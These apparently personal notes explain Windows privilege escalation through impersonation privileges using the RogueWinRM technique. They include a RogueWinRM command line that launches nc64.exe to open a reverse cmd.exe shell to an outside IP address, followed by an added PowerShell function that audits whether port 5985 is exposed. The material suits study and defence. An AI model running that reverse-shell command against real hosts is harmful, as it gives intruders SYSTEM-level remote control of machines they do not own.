These permissions allow for user impersonation. On Windows, the Local Service and Network Service accounts already have these privileges; if IIS is installed, there will often also be an IIS AppPool/DefaultAppPool service account with these permissions.

However, access to a service running as a user with these permissions isn’t enough on its own, as Windows will not allow an application to arbitrarily impersonate a user. Instead, we need a service that a highly privileged account can be tricked or forced into connecting to, at which point impersonation of that account will be allowed.

One way to do this is using the RogueWinRM exploit. The idea here is that when a user logs in, the BITS service creates a connection on port 5985 to the (local) WinRM service (which is used to execute PowerShell commands) as SYSTEM. If the WinRM service isn’t running, RogueWinRM can be run instead to capture these connections (I’m guessing that the WinRM service can also be back-doored using RogueWinRM directly, but that doing so may interfere with system functionality?).

Example RogueWinRM command line:

C:\RogueWinRM.exe -p C:\nc64.exe `
                  -a "-e cmd.exe 10.13.25.33 4442"
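
From the defender's side, the condition described above (the WinRM service not running, leaving port 5985 free for another process to bind) can be audited on a host. The following is an added example, not part of the original notes or of the RogueWinRM project. The function name `Test-WinRMPortExposure` is hypothetical, and the check assumes that the genuine WinRM listener is served through HTTP.sys, so a legitimate listener on 5985 is owned by PID 4 (System).

```powershell
# Added example (defensive audit), not from the original page.
# Assumption: the real WinRM listener is served by HTTP.sys, so a legitimate
# listener on TCP 5985 is owned by PID 4 (System). Any other owning process
# on that port deserves a closer look.
function Test-WinRMPortExposure {
    param([int]$Port = 5985)

    # State of the genuine WinRM service ($null if it is not installed)
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue

    # Everything currently listening on the WinRM HTTP port
    $listeners = @(Get-NetTCPConnection -LocalPort $Port -State Listen `
                                        -ErrorAction SilentlyContinue)

    # Resolve each listener to its owning process
    $details = foreach ($l in $listeners) {
        $proc = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            LocalAddress = $l.LocalAddress
            OwningPid    = $l.OwningProcess
            ProcessName  = $proc.Name
            Path         = $proc.Path
            # User-mode process bound directly to the port instead of HTTP.sys
            Unexpected   = ($l.OwningProcess -ne 4)
        }
    }

    [pscustomobject]@{
        WinRMStatus    = if ($svc) { $svc.Status } else { 'NotInstalled' }
        WinRMStartType = if ($svc) { $svc.StartType } else { $null }
        # True means nothing holds the port, i.e. the precondition from the text
        PortFree       = ($listeners.Count -eq 0)
        Listeners      = $details
    }
}

# Report for the local host
$report = Test-WinRMPortExposure
$report | Format-List WinRMStatus, WinRMStartType, PortFree
$report.Listeners | Where-Object Unexpected | Format-Table -AutoSize
```

A result with `PortFree` set to `True`, or any listener marked `Unexpected`, is worth following up; resolving the owning process path may require an elevated session.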